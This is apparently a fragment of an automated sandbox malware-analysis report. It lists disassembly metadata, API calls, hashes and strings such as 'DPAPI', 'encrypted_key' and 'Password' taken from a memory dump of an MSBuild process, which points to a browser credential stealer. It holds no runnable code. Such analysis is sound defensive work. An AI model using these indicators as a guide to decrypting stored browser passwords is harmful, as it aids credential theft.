                                                                    • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: __aulldiv
                                                                    • String ID: %d MB$@
                                                                    • API String ID: 3732870572-3474575989
                                                                    • Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                                                    • Instruction ID: 96825d9750bf8db03c9b3ba7d6dfdbb869a7567600a83181e99cf30d3b71d0f4
                                                                    • Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                                                    • Instruction Fuzzy Hash: CD210BB1E44218BBDB00DFD5CC49FAEB7B9FB45B14F104609F605BB280D77869018BA9
                                                                    APIs
                                                                    • memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92
                                                                      • Part of subcall function 00409B60: memcpy.MSVCRT(?,?,?), ref: 00409BC6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: memcmpmemcpy
                                                                    • String ID: $"encrypted_key":"$DPAPI
                                                                    • API String ID: 1784268899-738592651
                                                                    • Opcode ID: 858bb5d36e7e37b9704747d5b8cf33c67ecf781cccc3ca8f5e8d480075c2e052
                                                                    • Instruction ID: 5ad523267ed72994677b79ea1d9dce7d7822fbf486e040e59600fa97cf483dfd
                                                                    • Opcode Fuzzy Hash: 858bb5d36e7e37b9704747d5b8cf33c67ecf781cccc3ca8f5e8d480075c2e052
                                                                    • Instruction Fuzzy Hash: D53155B5D10109ABCB04EBE4DC85AEF77B8BF44304F14452AE915B7282E7389E04CBA5
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00407314
                                                                    • task.LIBCPMTD ref: 00407555
                                                                      • Part of subcall function 00409240: vsprintf_s.MSVCRT ref: 0040925B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: memsettaskvsprintf_s
                                                                    • String ID: Password
                                                                    • API String ID: 2675463923-3434357891
                                                                    • Opcode ID: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
                                                                    • Instruction ID: ef12ebdd473109685825b75701b45193a1214ac884297e43e73859b9717fa869
                                                                    • Opcode Fuzzy Hash: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
                                                                    • Instruction Fuzzy Hash: B8614DB5D0416C9BDB24DB50CD41BDAB7B8BF44304F0081EAE689A6281DB746FC9CFA5